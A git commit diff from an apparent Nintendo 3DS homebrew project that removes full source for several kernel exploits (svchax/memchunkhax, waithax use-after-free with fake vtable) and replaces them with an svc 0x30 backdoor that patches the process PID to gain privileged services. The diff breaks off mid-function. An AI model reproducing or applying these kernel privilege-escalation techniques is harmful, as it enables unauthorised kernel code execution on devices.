Remove kernel exploits, switch to fasthax backdoor.

This commit is contained in:
Steveice10 2017-01-07 15:55:27 -08:00
parent 3137dcb8a6
commit 33737b1292
11 changed files with 99 additions and 1055 deletions

View File

@ -53,23 +53,7 @@ static int util_get_lines(PrintConsole* console, const char* str) {
return lines;
}
static const devoptab_t* consoleStdOut = NULL;
static const devoptab_t* consoleStdErr = NULL;
void util_store_console_std() {
consoleStdOut = devoptab_list[STD_OUT];
consoleStdErr = devoptab_list[STD_ERR];
}
void util_panic(const char* s, ...) {
if(consoleStdOut != NULL) {
devoptab_list[STD_OUT] = consoleStdOut;
}
if(consoleStdErr != NULL) {
devoptab_list[STD_ERR] = consoleStdErr;
}
va_list list;
va_start(list, s);
@ -131,10 +115,6 @@ void util_panic(const char* s, ...) {
gfxFlushBuffers();
gspWaitForVBlank();
util_panic_quiet();
}
void util_panic_quiet() {
while(aptMainLoop()) {
hidScanInput();
if(hidKeysDown() & ~KEY_TOUCH) {

View File

@ -38,9 +38,7 @@ typedef struct {
u16 animationSequence[0x40];
} BNR;
void util_store_console_std();
void util_panic(const char* s, ...);
void util_panic_quiet();
FS_Path* util_make_path_utf8(const char* path);
void util_free_path_utf8(FS_Path* path);

View File

@ -1,114 +0,0 @@
#include <3ds.h>
#include <stdio.h>
#include "khax.h"
#include "svchax/svchax.h"
#include "waithax/waithax.h"
#define CURRENT_KPROCESS 0xFFFF9004
static void (*khax_backdoor)(void (*func)());
static volatile u32 khax_read32_kernel_addr;
static volatile u32 khax_read32_kernel_result;
static volatile u32 khax_write32_kernel_addr;
static volatile u32 khax_write32_kernel_value;
static void khax_read32_kernel_priv() {
asm volatile("cpsid aif");
khax_read32_kernel_result = *(u32*) khax_read32_kernel_addr;
}
static u32 khax_read32_kernel(u32 addr) {
khax_read32_kernel_addr = addr;
khax_backdoor(khax_read32_kernel_priv);
return khax_read32_kernel_result;
}
static void khax_write32_kernel_priv() {
asm volatile("cpsid aif");
*(u32*) khax_write32_kernel_addr = khax_write32_kernel_value;
}
static void khax_write32_kernel(u32 addr, u32 value) {
khax_write32_kernel_addr = addr;
khax_write32_kernel_value = value;
khax_backdoor(khax_write32_kernel_priv);
}
bool khax_execute() {
printf("khax: Retrieving system information...\n");
u32 kver = osGetKernelVersion();
bool n3ds = false;
APT_CheckNew3DS(&n3ds);
void (*khax_cleanup)() = NULL;
if(envIsHomebrew()) {
printf("khax: Choosing exploit to execute...\n");
if(kver > SYSTEM_VERSION(2, 51, 2)) {
printf("khax: Unsupported firmware version.\n");
return false;
} else if(kver > SYSTEM_VERSION(2, 50, 11)) {
printf("khax: Executing waithax...\n");
osSetSpeedupEnable(true);
if(!waithax_run()) {
printf("khax: waithax failed.\n");
return false;
}
osSetSpeedupEnable(false);
khax_backdoor = waithax_backdoor;
khax_cleanup = waithax_cleanup;
} else {
printf("khax: Executing svchax...\n");
svchax_init(false);
if(!__ctr_svchax) {
printf("khax: svchax failed.\n");
return false;
}
khax_backdoor = (void (*)(void (*func)())) svcBackdoor;
khax_cleanup = NULL;
}
printf("khax: Kernel exploit executed successfully.\n");
} else {
printf("khax: Not running as a 3DSX; assuming CIA/3DS with svcBackdoor access.\n");
khax_backdoor = (void (*)(void (*func)())) svcBackdoor;
khax_cleanup = NULL;
}
printf("khax: Retrieving PID kernel address...\n");
u32 pidAddr = khax_read32_kernel(CURRENT_KPROCESS) + (n3ds ? 0xBC : (kver > SYSTEM_VERSION(2, 40, 0)) ? 0xB4 : 0xAC);
printf("khax: Backing up PID and patching to 0...\n");
u32 oldPid = khax_read32_kernel(pidAddr);
khax_write32_kernel(pidAddr, 0);
printf("khax: Reinitializing srv...\n");
srvExit();
srvInit();
printf("khax: Restoring PID...\n");
khax_write32_kernel(pidAddr, oldPid);
printf("khax: Cleaning up...\n");
if(khax_cleanup != NULL) {
khax_cleanup();
}
printf("khax: Success.\n");
return true;
}

View File

@ -1,3 +0,0 @@
#pragma once
bool khax_execute();

View File

@ -1,498 +0,0 @@
#include <3ds.h>
#include <stdio.h>
#include <string.h>
#include <malloc.h>
#include "svchax.h"
#define CURRENT_KTHREAD 0xFFFF9000
#define CURRENT_KPROCESS 0xFFFF9004
#define CURRENT_KPROCESS_HANDLE 0xFFFF8001
#define RESOURCE_LIMIT_THREADS 0x2
#define MCH2_THREAD_COUNT_MAX 0x20
#define MCH2_THREAD_STACKS_SIZE 0x1000
#define SVC_ACL_OFFSET(svc_id) (((svc_id) >> 5) << 2)
#define SVC_ACL_MASK(svc_id) (0x1 << ((svc_id) & 0x1F))
#define THREAD_PAGE_ACL_OFFSET 0xF38
u32 __ctr_svchax = 0;
u32 __ctr_svchax_srv = 0;
extern void* __service_ptr;
typedef u32(*backdoor_fn)(u32 arg0, u32 arg1);
__attribute((naked))
static u32 svc_7b(backdoor_fn entry_fn, ...) // can pass up to two arguments to entry_fn(...)
{
__asm__ volatile(
"push {r0, r1, r2} \n\t"
"mov r3, sp \n\t"
"add r0, pc, #12 \n\t"
"svc 0x7B \n\t"
"add sp, sp, #8 \n\t"
"ldr r0, [sp], #4 \n\t"
"bx lr \n\t"
"cpsid aif \n\t"
"ldr r2, [r3], #4 \n\t"
"ldmfd r3!, {r0, r1} \n\t"
"push {r3, lr} \n\t"
"blx r2 \n\t"
"pop {r3, lr} \n\t"
"str r0, [r3, #-4]! \n\t"
"bx lr \n\t");
return 0;
}
static void k_enable_all_svcs(u32 isNew3DS)
{
u32* thread_ACL = *(*(u32***)CURRENT_KTHREAD + 0x22) - 0x6;
u32* process_ACL = *(u32**)CURRENT_KPROCESS + (isNew3DS ? 0x24 : 0x22);
memset(thread_ACL, 0xFF, 0x10);
memset(process_ACL, 0xFF, 0x10);
}
static u32 k_read_kaddr(u32* kaddr)
{
return *kaddr;
}
static u32 read_kaddr(u32 kaddr)
{
return svc_7b((backdoor_fn)k_read_kaddr, kaddr);
}
static u32 k_write_kaddr(u32* kaddr, u32 val)
{
*kaddr = val;
return 0;
}
static void write_kaddr(u32 kaddr, u32 val)
{
svc_7b((backdoor_fn)k_write_kaddr, kaddr, val);
}
__attribute__((naked))
static u32 get_thread_page(void)
{
__asm__ volatile(
"sub r0, sp, #8 \n\t"
"mov r1, #1 \n\t"
"mov r2, #0 \n\t"
"svc 0x2A \n\t"
"mov r0, r1, LSR#12 \n\t"
"mov r0, r0, LSL#12 \n\t"
"bx lr \n\t");
return 0;
}
typedef struct
{
Handle started_event;
Handle lock;
volatile u32 target_kaddr;
volatile u32 target_val;
} mch2_thread_args_t;
typedef struct
{
u32* stack_top;
Handle handle;
bool keep;
mch2_thread_args_t args;
} mch2_thread_t;
typedef struct
{
u32 old_cpu_time_limit;
bool isNew3DS;
u32 kernel_fcram_mapping_offset;
Handle arbiter;
volatile u32 alloc_address;
volatile u32 alloc_size;
u8* flush_buffer;
Handle dummy_threads_lock;
Handle target_threads_lock;
Handle main_thread_lock;
u32* thread_page_va;
u32 thread_page_kva;
u32 threads_limit;
Handle alloc_thread;
Handle poll_thread;
mch2_thread_t threads[MCH2_THREAD_COUNT_MAX];
} mch2_vars_t;
static void alloc_thread_entry(mch2_vars_t* mch2)
{
u32 tmp;
svcControlMemory(&tmp, mch2->alloc_address, 0x0, mch2->alloc_size, MEMOP_ALLOC, MEMPERM_READ | MEMPERM_WRITE);
svcExitThread();
}
static void dummy_thread_entry(Handle lock)
{
svcWaitSynchronization(lock, U64_MAX);
svcExitThread();
}
static void check_tls_thread_entry(bool* keep)
{
*keep = !((u32)getThreadLocalStorage() & 0xFFF);
svcExitThread();
}
static void target_thread_entry(mch2_thread_args_t* args)
{
svcSignalEvent(args->started_event);
svcWaitSynchronization(args->lock, U64_MAX);
if (args->target_kaddr)
write_kaddr(args->target_kaddr, args->target_val);
svcExitThread();
}
static u32 get_first_free_basemem_page(bool isNew3DS)
{
s64 v1;
int memused_base;
int memused_base_linear; // guessed
memused_base = osGetMemRegionUsed(MEMREGION_BASE);
svcGetSystemInfo(&v1, 2, 0);
memused_base_linear = 0x6C000 + v1 +
(osGetKernelVersion() > SYSTEM_VERSION(2, 49, 0) ? (isNew3DS ? 0x2000 : 0x1000) : 0x0);
return (osGetKernelVersion() > SYSTEM_VERSION(2, 40, 0) ? 0xE0000000 : 0xF0000000) // kernel FCRAM mapping
+ (isNew3DS ? 0x10000000 : 0x08000000) // FCRAM size
- (memused_base - memused_base_linear) // memory usage for pages allocated without the MEMOP_LINEAR flag
- 0x1000; // skip to the start addr of the next free page
}
static u32 get_threads_limit(void)
{
Handle resource_limit_handle;
s64 thread_limit_current;
s64 thread_limit_max;
u32 thread_limit_name = RESOURCE_LIMIT_THREADS;
svcGetResourceLimit(&resource_limit_handle, CURRENT_KPROCESS_HANDLE);
svcGetResourceLimitCurrentValues(&thread_limit_current, resource_limit_handle, &thread_limit_name, 1);
svcGetResourceLimitLimitValues(&thread_limit_max, resource_limit_handle, &thread_limit_name, 1);
svcCloseHandle(resource_limit_handle);
if (thread_limit_max > MCH2_THREAD_COUNT_MAX)
thread_limit_max = MCH2_THREAD_COUNT_MAX;
return thread_limit_max - thread_limit_current;
}
static void do_memchunkhax2(void)
{
static u8 flush_buffer[0x8000];
static u8 thread_stacks[MCH2_THREAD_STACKS_SIZE];
int i;
u32 tmp;
mch2_vars_t mch2 = {0};
mch2.flush_buffer = flush_buffer;
mch2.threads_limit = get_threads_limit();
mch2.kernel_fcram_mapping_offset = (osGetKernelVersion() > SYSTEM_VERSION(2, 40, 0)) ? 0xC0000000 : 0xD0000000;
for (i = 0; i < MCH2_THREAD_COUNT_MAX; i++)
mch2.threads[i].stack_top = (u32*)((u32)thread_stacks + (i + 1) * (MCH2_THREAD_STACKS_SIZE / MCH2_THREAD_COUNT_MAX));
APT_CheckNew3DS(&mch2.isNew3DS);
APT_GetAppCpuTimeLimit(&mch2.old_cpu_time_limit);
APT_SetAppCpuTimeLimit(5);
for (i = 0; i < mch2.threads_limit; i++)
{
svcCreateThread(&mch2.threads[i].handle, (ThreadFunc)check_tls_thread_entry, (u32)&mch2.threads[i].keep,
mch2.threads[i].stack_top, 0x18, 0);
svcWaitSynchronization(mch2.threads[i].handle, U64_MAX);
}
for (i = 0; i < mch2.threads_limit; i++)
if (!mch2.threads[i].keep)
svcCloseHandle(mch2.threads[i].handle);
svcCreateEvent(&mch2.dummy_threads_lock, 1);
svcClearEvent(mch2.dummy_threads_lock);
for (i = 0; i < mch2.threads_limit; i++)
if (!mch2.threads[i].keep)
svcCreateThread(&mch2.threads[i].handle, (ThreadFunc)dummy_thread_entry, mch2.dummy_threads_lock,
mch2.threads[i].stack_top, 0x3F - i, 0);
svcSignalEvent(mch2.dummy_threads_lock);
for (i = mch2.threads_limit - 1; i >= 0; i--)
if (!mch2.threads[i].keep)
{
svcWaitSynchronization(mch2.threads[i].handle, U64_MAX);
svcCloseHandle(mch2.threads[i].handle);
mch2.threads[i].handle = 0;
}
svcSleepThread(40000000LL);
svcCloseHandle(mch2.dummy_threads_lock);
u32 fragmented_address = 0;
mch2.arbiter = __sync_get_arbiter();
u32 linear_buffer;
svcControlMemory(&linear_buffer, 0, 0, 0x1000, MEMOP_ALLOC_LINEAR, MEMPERM_READ | MEMPERM_WRITE);
u32 linear_size = 0xF000;
u32 skip_pages = 2;
mch2.alloc_size = ((((linear_size - (skip_pages << 12)) + 0x1000) >> 13) << 12);
u32 mem_free = osGetMemRegionFree(MEMREGION_APPLICATION);
u32 fragmented_size = mem_free - linear_size;
extern u32 __ctru_heap;
extern u32 __ctru_heap_size;
fragmented_address = __ctru_heap + __ctru_heap_size;
u32 linear_address;
mch2.alloc_address = fragmented_address + fragmented_size;
svcControlMemory(&linear_address, 0x0, 0x0, linear_size, MEMOP_ALLOC_LINEAR,
MEMPERM_READ | MEMPERM_WRITE);
if (fragmented_size)
svcControlMemory(&tmp, (u32)fragmented_address, 0x0, fragmented_size, MEMOP_ALLOC,
MEMPERM_READ | MEMPERM_WRITE);
if (skip_pages)
svcControlMemory(&tmp, (u32)linear_address, 0x0, (skip_pages << 12), MEMOP_FREE, MEMPERM_DONTCARE);
for (i = skip_pages; i < (linear_size >> 12) ; i += 2)
svcControlMemory(&tmp, (u32)linear_address + (i << 12), 0x0, 0x1000, MEMOP_FREE, MEMPERM_DONTCARE);
u32 alloc_address_kaddr = osConvertVirtToPhys((void*)linear_address) + mch2.kernel_fcram_mapping_offset;
mch2.thread_page_kva = get_first_free_basemem_page(mch2.isNew3DS) - 0x10000; // skip down 16 pages
((u32*)linear_buffer)[0] = 1;
((u32*)linear_buffer)[1] = mch2.thread_page_kva;
((u32*)linear_buffer)[2] = alloc_address_kaddr + (((mch2.alloc_size >> 12) - 3) << 13) + (skip_pages << 12);
u32 dst_memchunk = linear_address + (((mch2.alloc_size >> 12) - 2) << 13) + (skip_pages << 12);
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
GSPGPU_InvalidateDataCache((void*)dst_memchunk, 16);
GSPGPU_FlushDataCache((void*)linear_buffer, 16);
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
svcCreateThread(&mch2.alloc_thread, (ThreadFunc)alloc_thread_entry, (u32)&mch2,
mch2.threads[MCH2_THREAD_COUNT_MAX - 1].stack_top, 0x3F, 1);
while ((u32) svcArbitrateAddress(mch2.arbiter, mch2.alloc_address, ARBITRATION_WAIT_IF_LESS_THAN_TIMEOUT, 0,
0) == 0xD9001814);
GX_TextureCopy((void*)linear_buffer, 0, (void*)dst_memchunk, 0, 16, 8);
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
gspWaitForPPF();
svcWaitSynchronization(mch2.alloc_thread, U64_MAX);
svcCloseHandle(mch2.alloc_thread);
u32* mapped_page = (u32*)(mch2.alloc_address + mch2.alloc_size - 0x1000);
volatile u32* thread_ACL = &mapped_page[THREAD_PAGE_ACL_OFFSET >> 2];
svcCreateEvent(&mch2.main_thread_lock, 0);
svcCreateEvent(&mch2.target_threads_lock, 1);
svcClearEvent(mch2.target_threads_lock);
for (i = 0; i < mch2.threads_limit; i++)
{
if (mch2.threads[i].keep)
continue;
mch2.threads[i].args.started_event = mch2.main_thread_lock;
mch2.threads[i].args.lock = mch2.target_threads_lock;
mch2.threads[i].args.target_kaddr = 0;
thread_ACL[0] = 0;
GSPGPU_FlushDataCache((void*)thread_ACL, 16);
GSPGPU_InvalidateDataCache((void*)thread_ACL, 16);
svcClearEvent(mch2.main_thread_lock);
svcCreateThread(&mch2.threads[i].handle, (ThreadFunc)target_thread_entry, (u32)&mch2.threads[i].args,
mch2.threads[i].stack_top, 0x18, 0);
svcWaitSynchronization(mch2.main_thread_lock, U64_MAX);
if (thread_ACL[0])
{
thread_ACL[SVC_ACL_OFFSET(0x7B) >> 2] = SVC_ACL_MASK(0x7B);
GSPGPU_FlushDataCache((void*)thread_ACL, 16);
GSPGPU_InvalidateDataCache((void*)thread_ACL, 16);
mch2.threads[i].args.target_kaddr = get_thread_page() + THREAD_PAGE_ACL_OFFSET + SVC_ACL_OFFSET(0x7B);
mch2.threads[i].args.target_val = SVC_ACL_MASK(0x7B);
break;
}
}
svcSignalEvent(mch2.target_threads_lock);
for (i = 0; i < mch2.threads_limit; i++)
{
if (!mch2.threads[i].handle)
continue;
if (!mch2.threads[i].keep)
svcWaitSynchronization(mch2.threads[i].handle, U64_MAX);
svcCloseHandle(mch2.threads[i].handle);
}
svcCloseHandle(mch2.target_threads_lock);
svcCloseHandle(mch2.main_thread_lock);
svcControlMemory(&tmp, mch2.alloc_address, 0, mch2.alloc_size, MEMOP_FREE, MEMPERM_DONTCARE);
write_kaddr(alloc_address_kaddr + linear_size - 0x3000 + 0x4, alloc_address_kaddr + linear_size - 0x1000);
svcControlMemory(&tmp, (u32)fragmented_address, 0x0, fragmented_size, MEMOP_FREE, MEMPERM_DONTCARE);
for (i = 1 + skip_pages; i < (linear_size >> 12) ; i += 2)
svcControlMemory(&tmp, (u32)linear_address + (i << 12), 0x0, 0x1000, MEMOP_FREE, MEMPERM_DONTCARE);
svcControlMemory(&tmp, linear_buffer, 0, 0x1000, MEMOP_FREE, MEMPERM_DONTCARE);
APT_SetAppCpuTimeLimit(mch2.old_cpu_time_limit);
}
static void gspwn(u32 dst, u32 src, u32 size, u8* flush_buffer)
{
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
GSPGPU_InvalidateDataCache((void*)dst, size);
GSPGPU_FlushDataCache((void*)src, size);
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
GX_TextureCopy((void*)src, 0, (void*)dst, 0, size, 8);
gspWaitForPPF();
memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
}
/* pseudo-code:
* if(val2)
* {
* *(u32*)val1 = val2;
* *(u32*)(val2 + 8) = (val1 - 4);
* }
* else
* *(u32*)val1 = 0x0;
*/
// X-X--X-X
// X-XXXX-X
static void memchunkhax1_write_pair(u32 val1, u32 val2)
{
u32 linear_buffer;
u8* flush_buffer;
u32 tmp;
u32* next_ptr3;
u32* prev_ptr3;
u32* next_ptr1;
u32* prev_ptr6;
svcControlMemory(&linear_buffer, 0, 0, 0x10000, MEMOP_ALLOC_LINEAR, MEMPERM_READ | MEMPERM_WRITE);
flush_buffer = (u8*)(linear_buffer + 0x8000);
svcControlMemory(&tmp, linear_buffer + 0x1000, 0, 0x1000, MEMOP_FREE, 0);
svcControlMemory(&tmp, linear_buffer + 0x3000, 0, 0x2000, MEMOP_FREE, 0);
svcControlMemory(&tmp, linear_buffer + 0x6000, 0, 0x1000, MEMOP_FREE, 0);
next_ptr1 = (u32*)(linear_buffer + 0x0004);
gspwn(linear_buffer + 0x0000, linear_buffer + 0x1000, 16, flush_buffer);
next_ptr3 = (u32*)(linear_buffer + 0x2004);
prev_ptr3 = (u32*)(linear_buffer + 0x2008);
gspwn(linear_buffer + 0x2000, linear_buffer + 0x3000, 16, flush_buffer);
prev_ptr6 = (u32*)(linear_buffer + 0x5008);
gspwn(linear_buffer + 0x5000, linear_buffer + 0x6000, 16, flush_buffer);
*next_ptr1 = *next_ptr3;
*prev_ptr6 = *prev_ptr3;
*prev_ptr3 = val1 - 4;
*next_ptr3 = val2;
gspwn(linear_buffer + 0x3000, linear_buffer + 0x2000, 16, flush_buffer);
svcControlMemory(&tmp, 0, 0, 0x2000, MEMOP_ALLOC_LINEAR, MEMPERM_READ | MEMPERM_WRITE);
gspwn(linear_buffer + 0x1000, linear_buffer + 0x0000, 16, flush_buffer);
gspwn(linear_buffer + 0x6000, linear_buffer + 0x5000, 16, flush_buffer);
svcControlMemory(&tmp, linear_buffer + 0x0000, 0, 0x1000, MEMOP_FREE, 0);
svcControlMemory(&tmp, linear_buffer + 0x2000, 0, 0x4000, MEMOP_FREE, 0);
svcControlMemory(&tmp, linear_buffer + 0x7000, 0, 0x9000, MEMOP_FREE, 0);
}
static void do_memchunkhax1(void)
{
u32 saved_vram_value = *(u32*)0x1F000008;
// 0x1F000000 contains the enable bit for svc 0x7B
memchunkhax1_write_pair(get_thread_page() + THREAD_PAGE_ACL_OFFSET + SVC_ACL_OFFSET(0x7B), 0x1F000000);
write_kaddr(0x1F000008, saved_vram_value);
}
Result svchax_init(bool patch_srv)
{
bool isNew3DS;
APT_CheckNew3DS(&isNew3DS);
u32 kver = osGetKernelVersion();
if (!__ctr_svchax)
{
if (__service_ptr)
{
if (kver > SYSTEM_VERSION(2, 50, 11))
return -1;
else if (kver > SYSTEM_VERSION(2, 46, 0))
do_memchunkhax2();
else
do_memchunkhax1();
}
svc_7b((backdoor_fn)k_enable_all_svcs, isNew3DS);
__ctr_svchax = 1;
}
if (patch_srv && !__ctr_svchax_srv)
{
u32 PID_kaddr = read_kaddr(CURRENT_KPROCESS) + (isNew3DS ? 0xBC : (kver > SYSTEM_VERSION(2, 40, 0)) ? 0xB4 : 0xAC);
u32 old_PID = read_kaddr(PID_kaddr);
write_kaddr(PID_kaddr, 0);
srvExit();
srvInit();
write_kaddr(PID_kaddr, old_PID);
__ctr_svchax_srv = 1;
}
return 0;
}

View File

@ -1,47 +0,0 @@
#ifndef __SVCHAX_H__
#define _SVCHAX_H__
/*
* for 3DSX builds, svchax_init expects that:
*
* - gfxInit was already called.
* - new 3DS higher clockrate and L2 cache are disabled.
* - there is at least 64 KBytes (16 pages) of unallocated linear memory.
* ( the current 3dsx loaders and ctrulib's default allocator will keep 1MB
* of unallocated linear memory, so this is only relevant when using
* a custom allocator)
*
*
* svchax_init will grant full svc access to the calling thread and process
* up to system version 10.7 (kernel version 2.50-11), by using:
* - memchunkhax1 for kernel version <= 2.46-0
* - memchunkhax2 for 2.46-0 < kernel version <= 2.50-11
*
* access to privileged services can also be obtained by calling
* svchax_init with patch_srv set to true.
*
* __ctr_svchax and __ctr_svchax_srv will reflect the current
* status of the privileged access for svc calls and services respectively.
*
* svchax assumes that CIA builds already have access to svcBackdoor
* and will skip running memchunkhax there.
*
*/
#include <3ds/types.h>
#ifdef __cplusplus
extern "C" {
#endif
Result svchax_init(bool patch_srv);
extern u32 __ctr_svchax;
extern u32 __ctr_svchax_srv;
#ifdef __cplusplus
}
#endif
#endif //_SVCHAX_H__

View File

@ -1,9 +0,0 @@
#pragma once
#include <3ds/types.h>
typedef u32(*backdoor_fn)(u32 arg0, u32 arg1);
u32 svc_7b(void* entry_fn, ...); // can pass up to two arguments to entry_fn(...)
Result svcCreateSemaphoreKAddr(Handle *semaphore, s32 initialCount, s32 maxCount, u32 **kaddr);

View File

@ -1,41 +0,0 @@
.arm
.section .text
@ Shamelessly based from Steveice's memchunkhax2 repo. I miss those old days
@ Credits to TuxSH for finding this leak
@ Please don't expect KTM for this
.global svcCreateSemaphoreKAddr
.type svcCreateSemaphoreKAddr, %function
svcCreateSemaphoreKAddr:
str r0, [sp, #-4]!
str r3, [sp, #-4]!
svc 0x15
ldr r3, [sp], #4
sub r2, r2, #4 @ Fix the kobject ptr
str r2, [r3]
ldr r3, [sp], #4
str r1, [r3]
bx lr
@ Here for debug/dev purposes
.global svc_7b
.type svc_7b, %function
svc_7b:
push {r0, r1, r2}
mov r3, sp
add r0, pc, #12
svc 0x7b
add sp, sp, #8
ldr r0, [sp], #4
bx lr
cpsid aif
ldr r2, [r3], #4
ldmfd r3!, {r0, r1}
push {r3, lr}
blx r2
pop {r3, lr}
str r0, [r3, #-4]!
mov r0, #0
bx lr

View File

@ -1,204 +0,0 @@
#include <3ds.h>
#include <stdio.h>
#include <string.h>
#include "waithax.h"
#include "utils.h"
static Handle g_backdoor_semaphore;
static KSemaphore* g_backdoor_ksemaphore;
static KSemaphore* g_hax_ksemaphore;
static KSemaphore g_backup_data;
static void* g_fake_ksemaphore_vtable[KSEMAPHORE_VTABLESIZE / sizeof(void*)];
static void (*g_backdoor_method)(void);
static u32 g_exploit_result = 0;
static bool g_debug_mode = false;
static void K_Debug_PatchRefcount(KSemaphore *semaphore, u32 value)
{
semaphore->refCount = value;
}
static bool waithax_kernel11_backdoor(KSemaphore *this, void *thread)
{
g_backdoor_method();
return true;
}
static void waithax_kernel11_setup_step1(KSemaphore *this)
{
// Turn interrupts off
__asm__ volatile("cpsid aif");
// Backup the KObjectLink from the hax semaphore location
memcpy(&g_backup_data, this, sizeof(KSemaphore));
// Copy a valid KSemaphore on the current semaphore to prevent crashes after
// returning from this fake vtable method
memcpy(this, g_backdoor_ksemaphore, sizeof(KSemaphore));
// Copy the KSemaphore vtable from kernel memory to the current userland
// process' memory
memcpy(g_fake_ksemaphore_vtable, this->vtable, KSEMAPHORE_VTABLESIZE);
// Point the "backdoor" KSemaphore's vtable to the fake vtable located in
// the current userland process' memory
g_backdoor_ksemaphore->vtable = g_fake_ksemaphore_vtable;
// Increment the refcount to not cause an unwanted deallocation when
// WaitSynchronization1 terminates.
this->refCount++;
// Write the exploit result to validate the kernel code execution
g_exploit_result = 0xcafebabe;
}
static void waithax_kernel11_setup_step2(void)
{
// Turn interrupts off
__asm__ volatile("cpsid aif");
// Restore KObjectLink on the hax semaphore location
memcpy(g_hax_ksemaphore, &g_backup_data, sizeof(KSemaphore));
}
static void waithax_setRefCount(Handle handle, u32 value)
{
s64 outInfo;
Result res = svcGetHandleInfo(&outInfo, handle, 1);
u32 refCount = outInfo & 0xFFFFFFFF;
printf("Handle %08lx, count: %08lx, res %08lx\n", handle, refCount, res);
if(refCount == value)
return;
u32 loop = value - refCount;
if(refCount > value)
loop = (u32) -refCount + value;
s32 out;
Handle handles[0x100];
for(u32 i = 0; i < 0x100; i++)
handles[i] = handle;
handles[0xFF] = 0xDEADDEAD;
u32 bulkLoop = loop / 0xFF;
u32 individualLoop = loop % 0xFF;
for(u32 i = 0; i < bulkLoop; i++)
{
res = svcWaitSynchronizationN(&out, handles, 0x100, true, 0);
refCount += 0xFF;
if(i % 0x10000 == 0)
printf("Left: %08lx | i: %08lx | count: %08lx\n", bulkLoop - i, i,
refCount);
}
handles[1] = 0xDEADDEAD;
for(u32 i = 0; i < individualLoop; i++)
{
res = svcWaitSynchronizationN(&out, handles, 2, true, 0);
refCount++;
printf("Left: %08lx | i: %08lx | count: %08lx\n", individualLoop - i, i,
refCount);
}
}
static void wait_thread(void *h)
{
Handle semaphore = (Handle)h;
Result res = svcWaitSynchronization(semaphore, 4000000000LL);
printf("Thread WaitSync res: %08lx\n", res);
}
bool waithax_run(void)
{
Result res;
Handle sHax, sVtable;
Thread thWait;
u32 *kObject;
// Setup KSemaphores
res = svcCreateSemaphoreKAddr(&sHax, 0, 5, (u32**)&g_hax_ksemaphore);
printf("Creating KSemaphore: %08lx h%08lx @%08lx\n", res, sHax,
(u32)g_hax_ksemaphore);
res = svcCreateSemaphoreKAddr(&sVtable, 0,
(u32)waithax_kernel11_setup_step1, &kObject);
printf("Creating KSemaphore: %08lx h%08lx @%08lx\n", res, sVtable,
(u32)kObject);
res = svcCreateSemaphoreKAddr(&g_backdoor_semaphore, 0, 5,
(u32**)&g_backdoor_ksemaphore);
printf("Creating KSemaphore: %08lx h%08lx @%08lx\n", res,
g_backdoor_semaphore, (u32)g_backdoor_ksemaphore);
// Setup the refcount
if(g_debug_mode)
svc_7b(K_Debug_PatchRefcount, g_hax_ksemaphore, 0U);
else
waithax_setRefCount(sHax, 0U);
// Free the "vtable" KSemaphore
svcCloseHandle(sVtable);
// Spawn the wait thread
printf("Spawning wait thread\n");
thWait = threadCreate(wait_thread, (void*)sHax, 0x4000, 0x20, -2, true);
// Deallocate the "hax" KSemaphore
printf("Freeing hax KSemaphore\n");
svcCloseHandle(sHax);
// Wait for the thread execution to end, at which point Kernel11-mode code
// will have been executed
printf("Waiting for thread\n");
threadJoin(thWait, 15000000000LL);
// Setup the fake vtable method for the "backdoor" KSemaphore to run
// Kernel11-mode code in a better environment and in an easier way
printf("Setting up fake vtable method\n");
g_fake_ksemaphore_vtable[12] = waithax_kernel11_backdoor;
// Restore "hax" KSemaphore data
waithax_backdoor(waithax_kernel11_setup_step2);
// Return exploit result
printf("Exploit result: %08lx\n", g_exploit_result);
return g_exploit_result == 0xcafebabe;
}
void waithax_cleanup(void)
{
svcCloseHandle(g_backdoor_semaphore);
}
void waithax_debug(bool enabled)
{
g_debug_mode = enabled;
}
void waithax_backdoor(void (*method)(void))
{
g_backdoor_method = method;
svcWaitSynchronization(g_backdoor_semaphore, -1);
}

View File

@ -1,23 +0,0 @@
#pragma once
#include <3ds/types.h>
#define KSEMAPHORE_SIZE (0x2C)
#define KSEMAPHORE_VTABLESIZE (0x16 * sizeof(void*))
typedef struct KSemaphore {
void **vtable;
u32 refCount;
u32 __a;
u32 __b;
u32 __c;
u32 __ievent[3];
u32 count;
u32 maxCount;
void *owner;
} __attribute__((packed)) KSemaphore;
bool waithax_run(void);
void waithax_cleanup(void);
void waithax_debug(bool enabled);
void waithax_backdoor(void (*method)(void));

View File

@ -1,93 +1,108 @@
#include <sys/iosupport.h>
#include <malloc.h>
#include <stdio.h>
#include <3ds.h>
#include "core/clipboard.h"
#include "core/screen.h"
#include "core/util.h"
#include "hax/khax.h"
#include "ui/error.h"
#include "ui/mainmenu.h"
#include "ui/ui.h"
#include "ui/section/task/task.h"
static bool am_initialized = false;
static bool cfgu_initialized = false;
static bool ac_initialized = false;
static bool ptmu_initialized = false;
static bool pxidev_initialized = false;
static bool httpc_initialized = false;
static bool soc_initialized = false;
#define CURRENT_KPROCESS (*(void**) 0xFFFF9004)
#define KPROCESS_PID_OFFSET_OLD (0xB4)
#define KPROCESS_PID_OFFSET_NEW (0xBC)
static bool backdoor_ran = false;
static bool n3ds = false;
static u32 old_pid = 0;
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wreturn-type"
static __attribute__((naked)) Result svcGlobalBackdoor(s32 (*callback)()) {
asm volatile(
"svc 0x30\n"
"bx lr"
);
}
#pragma GCC diagnostic pop
static s32 patch_pid_kernel() {
u32 *pidPtr = (u32*) (CURRENT_KPROCESS + (n3ds ? KPROCESS_PID_OFFSET_NEW : KPROCESS_PID_OFFSET_OLD));
old_pid = *pidPtr;
*pidPtr = 0;
backdoor_ran = true;
return 0;
}
static s32 restore_pid_kernel() {
u32 *pidPtr = (u32*) (CURRENT_KPROCESS + (n3ds ? KPROCESS_PID_OFFSET_NEW : KPROCESS_PID_OFFSET_OLD));
*pidPtr = old_pid;
backdoor_ran = true;
return 0;
}
static bool attempt_patch_pid() {
backdoor_ran = false;
APT_CheckNew3DS(&n3ds);
svcGlobalBackdoor(patch_pid_kernel);
srvExit();
srvInit();
svcGlobalBackdoor(restore_pid_kernel);
return backdoor_ran;
}
static void (*exitFuncs[16])()= {NULL};
static u32 exitFuncCount = 0;
static void* soc_buffer = NULL;
static u32 old_time_limit = UINT32_MAX;
void cleanup_services() {
if(soc_initialized) {
socExit();
if(soc_buffer != NULL) {
